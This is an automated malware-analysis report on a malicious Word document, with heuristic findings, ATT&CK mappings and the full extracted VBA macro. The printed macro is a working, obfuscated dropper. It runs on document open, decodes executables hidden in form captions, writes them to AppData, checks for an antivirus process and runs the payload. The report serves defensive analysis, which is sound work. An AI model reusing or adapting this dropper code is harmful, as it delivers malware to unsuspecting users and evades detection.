MALICIOUS (Risk Score 358)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the presence of a potential Shell call, a CreateObject call, and an embedded PE file that is decoded from a VBA payload string. This suggests the macro's primary function is to drop and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics (11)

- ClamAV: Ole2.Macro.Agent-9858864-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell GetQuoteStart() & GetCommand(cvacjgzddhi) & GetQuoteEnd(), GetWindowStyle()`
- Embedded PE decoded from VBA/UserForm payload string (critical, OLE_VBA_EMBEDDED_PE_DROPPER): The VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set wsh = CreateObject("W" + _`
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched line in script: `result(0) = CallByName(UserForm1.Controls("C" + _`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `GetAppDataPath = Environ("A" + _`
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found. Disassembly hidden: these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions; a sled or padding/filler run, not program logic).
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x41 bytes. Disassembly hidden: these bytes score as data, not coherent x86 code (5/10 branch targets land on an instruction boundary, 50% coherence).
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OLE body):
  - http://ocsp.digicert.com
  - http://s.symcd.com
  - http://ts-ocsp.ws.symantec.com
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.microsoft.com/SMI/2016/WindowsSettings
  - http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
  - http://crl3.digicert.com/DigiCertTrustedRootG4.crl
  - http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
  - http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
  - http://www.digicert.com/CPS
  - http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
  - https://calibre-ebook.com
  - https://d.symcb.com/cps
  - https://d.symcb.com/rpa (extracted twice)
  - http://s.symcb.com/universal-root.crl
  - http://ts-crl.ws.symantec.com/sha256-tss-ca.crl
  - http://ts-aia.ws.symantec.com/sha256-tss-ca.cer
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9760 bytes |

SHA-256: 9f6362e074d741918f30426c2cf4c282d9a27c607421b387b1817809cc4457ea

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As LongPtr, ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const TH32CS_SNAPPROCESS As Long = &H2
Private Const MAX_PATH As Long = 260
Private Type PROCESSENTRY32
    dwSize As Long
    cntUsage As Long
    th32ProcessID As Long
    th32DefaultHeapID As Long
    th32ModuleID As Long
    cntThreads As Long
    th32ParentProcessID As Long
    pcPriClassBase As Long
    dwFlags As Long
    szExeFile As String * MAX_PATH
End Type
Private Function CreateSnapShot() As Long
    CreateSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
End Function
Private Function GetExeFileName(procEntry As PROCESSENTRY32) As String
    Dim nullPos As Long
    nullPos = InStr(procEntry.szExeFile, Chr$(0))
    If nullPos > 0 Then
        GetExeFileName = Left$(procEntry.szExeFile, nullPos - 1)
    Else
        GetExeFileName = procEntry.szExeFile
    End If
End Function
Function IPR(processName As String) As Boolean
    Dim hSnapshot As Long
    Dim procEntry As PROCESSENTRY32
    Dim ret As Long
    Dim currentName As String
    IPR = False
    hSnapshot = CreateSnapShot()
    If hSnapshot = 0 Then Exit Function
    procEntry.dwSize = Len(procEntry)
    ret = Process32First(hSnapshot, procEntry)
    Do While ret <> 0
        currentName = GetExeFileName(procEntry)
        If LCase(currentName) = LCase(processName) Then
            IPR = True
            Exit Do
        End If
        ret = Process32Next(hSnapshot, procEntry)
    Loop
    CloseHandle hSnapshot
End Function
Sub xvqkblk(programPath As String)
    Dim wsh As Object
    Set wsh = CreateObject("W" + _
        "S" + _
        "c" + _
        "ri" + _
        "p" + _
        "t." + _
        "S" + _
        "h" + _
        "el" + _
        "l")
    wsh.Run """" & programPath & """", 1, False
End Sub
Function fileExist(filePath)
    Dim fso
    Set fso = CreateObject("Sc" + _
        "ri" + _
        "pti" + _
        "n" + _
        "g.Fi" + _
        "le" + _
        "Sys" + _
        "te" + _
        "m" + _
        "Obje" + _
        "ct")
    If fso.fileExists(filePath) Then
        fileExist = True
    Else
        fileExist = False
    End If
    Set fso = Nothing
End Function
Sub ixkwkpzwa(cvacjgzddhi As String)
    ExecuteShellCommand cvacjgzddhi
End Sub
Sub ExecuteShellCommand(cvacjgzddhi As String)
    Shell GetQuoteStart() & GetCommand(cvacjgzddhi) & GetQuoteEnd(), GetWindowStyle()
End Sub
Function GetQuoteStart() As String
    GetQuoteStart = Chr(34)
End Function
Function GetCommand(cvacjgzddhi As String) As String
    GetCommand = cvacjgzddhi
End Function
Function GetQuoteEnd() As String
    GetQuoteEnd = Chr(34)
End Function
Function GetWindowStyle() As Integer
    GetWindowStyle = CalculateStyleValue()
End Function
Function CalculateStyleValue() As Integer
    CalculateStyleValue = SubtractValues(10, 5)
End Function
Function SubtractValues(a As Integer, b As Integer) As Integer
    SubtractValues = a - b
End Function
Private Function CleanInputString(s As String) As String
    On Error Resume Next
    CleanInputString = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function
Private Function DB64I(cleanedStr As String) As Byte()
    On Error Resume Next
    Dim objNode As Object
    Set objNode = CreateObject("M" + _
        "SX" + _
        "M" + _
        "L2" + _
        ".DO" + _
        "M" + _
        "Do" + _
        "cu" + _
        "me" + _
        "nt").createElement("b6" + _
        "4")
    With objNode
        .DataType = "bi" + _
            "n.b" + _
            "as" + _
            "e6" + _
            "4"
        .Text = cleanedStr
        DB64I = .nodeTypedValue
    End With
    If Err.Number <> 0 Then DB64I = Split("")
End Function
Function bAd64(s As String) As Byte()
    Dim cleanedStr As String
    cleanedStr = CleanInputString(s)
    bAd64 = DB64I(cleanedStr)
End Function
Private Function PrepareBuffer(buf As Variant) As Byte()
    Dim i As Long
    Dim tmp() As Byte
    If VarType(buf) <> vbArray + vbByte Then
        PrepareBuffer = Split("")
        Exit Function
    End If
    ReDim tmp(LBound(buf) To UBound(buf))
    For i = LBound(buf) To UBound(buf)
        tmp(i) = buf(i)
    Next i
    PrepareBuffer = tmp
End Function
Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
    Dim fileNum As Integer
    Dim i As Long
    On Error GoTo ErrHandler
    fileNum = FreeFile
    Open FileName For Binary As #fileNum
    For i = LBound(staticBuf) To UBound(staticBuf)
        Put #fileNum, , staticBuf(i)
    Next i
    Close #fileNum
    WBTD = True
    Exit Function
ErrHandler:
    WBTD = False
End Function
Function WrtBnfile(FileName As String, buf As Variant) As Boolean
    Dim staticBuf() As Byte
    staticBuf = PrepareBuffer(buf)
    On Error Resume Next
    If UBound(staticBuf) < LBound(staticBuf) Then
        WrtBnfile = False
        Exit Function
    End If
    On Error GoTo 0
    WrtBnfile = WBTD(FileName, staticBuf)
End Function
Function vzexuqlaqfmxnd(path As String, conte As String)
    hwminiArraXx = bAd64(conte)
    WrtBnfile path, hwminiArraXx
End Function
Function GetAppDataPath() As String
    GetAppDataPath = Environ("A" + _
        "pp" + _
        "D" + _
        "at" + _
        "a")
End Function
Function BuildDestPath1(appDataPath As String) As String
    BuildDestPath1 = appDataPath & "\e" + _
        "bo" + _
        "ok-" + _
        "e" + _
        "d" + _
        "it" + _
        ".e" + _
        "xe"
End Function
Function BuildDestPath2(appDataPath As String) As String
    BuildDestPath2 = appDataPath & "\C" + _
        "Al" + _
        "ibr" + _
        "e" + _
        "-LA" + _
        "un" + _
        "c" + _
        "h" + _
        "er.d" + _
        "ll"
End Function
Function BuildDestPath3(appDataPath As String) As String
    BuildDestPath3 = appDataPath & "\e" + _
        "di" + _
        "t2." + _
        "h" + _
        "lp"
End Function
Function GetFormContent() As String()
    Dim result(2) As String
    result(0) = CallByName(UserForm1.Controls("C" + _
        "om" + _
        "ma" + _
        "n" + _
        "d" + _
        "But" + _
        "t" + _
        "on1"), "Ca" + _
        "pt" + _
        "i" + _
        "on", VbGet)
    result(1) = CallByName(UserForm2.Controls("Co" + _
        "mma" + _
        "nd" + _
        "Bu" + _
        "t" + _
        "to" + _
        "n" + _
        "1"), "C" + _
        "ap" + _
        "t" + _
        "io" + _
        "n", VbGet)
    result(2) = CallByName(UserForm3.Controls("Com" + _
        "ma" + _
        "ndBu" + _
        "tt" + _
        "on1"), "Ca" + _
        "pti" + _
        "on", VbGet)
    GetFormContent = result
End Function
Sub CopyRequiredFiles(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
    vzexuqlaqfmxnd destPath1, content(0)
    vzexuqlaqfmxnd destPath2, content(1)
    vzexuqlaqfmxnd destPath3, content(2)
End Sub
Sub CheckProcessAndRun(filePath As String)
    If IPR("a" + _
        "v" + _
        "p" + _
        "." + _
        "e" + _
        "x" + _
        "e") Then
        xvqkblk (filePath)
    Else
        ixkwkpzwa (filePath)
    End If
End Sub
Function start()
    Dim appDataPath As String
    Dim destPath1 As String, destPath2 As String, destPath3 As String
    appDataPath = GetAppDataPath()
    destPath1 = BuildDestPath1(appDataPath)
    destPath2 = BuildDestPath2(appDataPath)
    destPath3 = BuildDestPath3(appDataPath)
    If Not fileExist(destPath1) Then
        Dim content() As String
        content = GetFormContent()
        CopyRequiredFiles destPath1, destPath2, destPath3, content
    End If
    CheckProcessAndRun destPath1
End Function
Sub AutoOpen()
    start
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{11C092C5-485D-4090-B1AE-F818504DD278}{7E6329FE-5251-4EA9-8DB5-91AC7F6DC093}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E93AEF7F-409B-473E-898F-3B87FE741F26}{6816DD3D-A376-45A8-9A88-02F2A8DC9F68}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{56E45436-44B1-4E40-BC1E-C77B8BE8F702}{BA6C2CC5-358C-4630-9272-FC85AAA4281D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vba_embedded_payload.bin | vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 96368 bytes |

SHA-256: 2459fafef92fba15db51222e6b94e9853b7eff3256a54be22736e41b587a1b1f